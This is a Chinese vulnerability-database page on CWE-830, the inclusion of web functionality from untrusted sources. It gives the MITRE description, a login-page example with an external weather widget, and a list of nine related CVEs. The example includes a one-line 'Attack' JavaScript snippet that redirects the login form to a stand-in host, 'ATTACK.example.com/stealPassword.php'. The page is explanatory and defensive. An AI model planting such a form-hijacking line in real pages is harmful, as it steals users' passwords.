目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CWE-830 从非可信源包含Web功能例程 类漏洞列表 9

CWE-830 从非可信源包含Web功能例程 类弱点 9 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-830指从不可信源引入Web功能(如小部件)的漏洞。攻击者常利用此缺陷,通过注入恶意脚本或篡改第三方资源,使代码在应用域内执行,从而获取对产品的完全控制权。开发者应避免直接嵌入不可信内容,改用沙箱隔离、内容安全策略(CSP)或严格验证来源,以限制执行权限并防止跨域攻击。

MITRE CWE 官方描述
CWE:CWE-830 从不信任源包含 Web 功能 英文:产品从另一个域包含 Web 功能(如 Web 小部件),导致其在产品的域内运行,从而可能授予不信任源对产品的完全访问和控制权。 在基于 Web 的环境中包含第三方功能存在风险,尤其是当功能的来源不可信时。即使第三方是可信来源,如果该可信源被攻破,或者代码在从第三方传输到产品的过程中被修改,产品仍可能遭受攻击和恶意行为。这种弱点在 Web 上的“混合应用”(mashup)开发中很常见,其中可能包含来自其他域的功能。例如,基于 Javascript 的 Web 小部件可以通过使用 `<SCRIPT SRC="http://other.domain.here">` 标签插入,这会导致代码在产品的域内运行,而不是从加载小部件的远程站点运行。因此,包含的代码可以访问本地 DOM,包括开发者可能不希望远程站点能够访问的 cookies 和其他数据。这些依赖关系可能是可取的,甚至是必需的,但有时程序员并未意识到依赖关系的存在。
常见影响 (1)
Confidentiality, Integrity, AvailabilityExecute Unauthorized Code or Commands
代码示例 (1)
This login webpage includes a weather widget from an external website:
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
Bad · HTML
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
Attack · JavaScript
CVE ID标题CVSS风险等级Published
CVE-2025-65109 Minder 安全漏洞 — minder 4.3 -2025-11-21
CVE-2025-46652 IZArc 安全漏洞 — IZArc 6.1 Medium2025-04-26
CVE-2025-43703 Anki 安全漏洞 — Anki 6.1 Medium2025-04-16
CVE-2025-33027 Bandisoft Bandizip 安全漏洞 — Bandizip 6.1 Medium2025-04-15
CVE-2025-33026 PeaZip 安全漏洞 — PeaZip 6.1 Medium2025-04-15
CVE-2025-33028 WinZip 安全漏洞 — WinZip 6.1 Medium2025-04-15
CVE-2024-35180 OMERO.web 安全漏洞 — omero-web 6.1 Medium2024-05-21
CVE-2023-2588 Teltonika Remote Management System 安全漏洞 — Remote Management System 8.8 High2023-05-22
CVE-2021-28162 Eclipse Theia 注入漏洞 — Eclipse Theia 6.1 -2021-03-12

CWE-830(从非可信源包含Web功能例程) 是常见的弱点类别,本平台收录该类弱点关联的 9 条 CVE 漏洞。